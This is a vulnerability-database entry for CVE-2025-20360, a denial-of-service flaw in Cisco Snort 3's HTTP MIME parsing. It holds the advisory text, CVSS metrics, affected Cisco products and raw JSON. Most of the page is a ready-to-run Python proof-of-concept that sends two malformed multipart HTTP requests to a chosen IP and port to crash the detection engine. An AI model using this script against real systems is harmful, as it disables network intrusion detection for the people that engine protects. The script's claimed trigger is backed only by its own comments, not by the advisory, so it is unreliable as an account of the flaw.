Security Vulnerability Report
中文
CVE-2025-20360 CVSS 5.8 MEDIUM

CVE-2025-20360

Published: 2025-10-15 17:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Multiple Cisco products are affected by a vulnerability in the Snort 3 HTTP Decoder that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to restart. This vulnerability is due to a lack of complete error checking when the MIME fields of the HTTP header are parsed. An attacker could exploit this vulnerability by sending crafted HTTP packets through an established connection to be parsed by Snort 3. A successful exploit could allow the attacker to cause a DoS condition when the Snort 3 Detection Engine unexpectedly restarts.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Cisco Snort 3(受影响的版本范围请参考Cisco官方安全公告)
Cisco Firepower Management Center
Cisco Firepower Threat Defense (FTD)
Cisco Secure Firewall系列设备
其他集成Snort 3检测引擎的Cisco产品

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-20360 - Cisco Snort 3 HTTP Decoder MIME Parsing DoS PoC # This PoC demonstrates sending crafted HTTP packets with malformed MIME fields # to trigger Snort 3 Detection Engine restart (DoS condition). # # Usage: python3 cve_2025_20360_poc.py <target_ip> <target_port> import socket import sys import struct def build_malformed_http_request(): """ Build an HTTP request with malformed MIME fields to trigger the Snort 3 HTTP decoder vulnerability. The malformed Content-Type field contains an excessively long boundary parameter that triggers incomplete error checking in the MIME parser. """ # Craft a multipart/form-data Content-Type with an extremely long boundary # This triggers the lack of complete error checking in MIME field parsing long_boundary = "=" * 8192 # Excessively long boundary parameter http_payload = ( "POST /upload HTTP/1.1\r\n" "Host: target\r\n" "User-Agent: Mozilla/5.0\r\n" f"Content-Type: multipart/form-data; boundary{long_boundary}\r\n" "Content-Length: 13\r\n" "\r\n" "--malformed--" ) return http_payload.encode('utf-8') def build_alternative_mime_exploit(): """ Alternative exploit: malformed Content-Disposition with invalid filename parameter containing null bytes and special chars. """ payload = ( "POST /api/upload HTTP/1.1\r\n" "Host: target\r\n" "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary\r\n" "Content-Length: 500\r\n" "\r\n" "------WebKitFormBoundary\r\n" "Content-Disposition: form-data; name=\"file\"; filename=\"\x00\xff\xfe\xfd\xfc\xfb\xfa\xf9\xf8\xf7\xf6\xf5\xf4\xf3\xf2\xf1\xf0.txt\"\r\n" "Content-Type: application/octet-stream\r\n" "\r\n" "AAAA\r\n" "------WebKitFormBoundary--\r\n" ) return payload.encode('latin-1') def send_exploit(target_ip, target_port): """Send the crafted HTTP packet to the target.""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Send the malformed HTTP request payload = build_malformed_http_request() print(f"[*] Sending malformed MIME field payload ({len(payload)} bytes) to {target_ip}:{target_port}") sock.send(payload) # Also send the alternative exploit payload2 = build_alternative_mime_exploit() print(f"[*] Sending alternative MIME exploit payload ({len(payload2)} bytes)") sock.send(payload2) # Wait for response or connection drop (indicating Snort restart) try: response = sock.recv(4096) print(f"[*] Received response: {response[:100]}") except socket.timeout: print("[*] Connection timed out - possible Snort 3 Detection Engine restart triggered!") except ConnectionResetError: print("[*] Connection reset - Snort 3 Detection Engine likely crashed!") sock.close() except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_ip> <target_port>") print(f"Example: {sys.argv[0]} 192.168.1.100 80") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) print("=" * 60) print("CVE-2025-20360 - Cisco Snort 3 HTTP Decoder DoS PoC") print("=" * 60) send_exploit(target_ip, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-20360", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:15:49.433", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple Cisco products are affected by a vulnerability in the Snort 3 HTTP Decoder that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to restart.\r\n\r\nThis vulnerability is due to a lack of complete error checking when the MIME fields of the HTTP header are parsed. An attacker could exploit this vulnerability by sending crafted HTTP packets through an established connection to be parsed by Snort 3. A successful exploit could allow the attacker to cause a DoS condition when the Snort 3 Detection Engine unexpectedly restarts."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-805"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-mime-vulns-tTL8PgVH", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.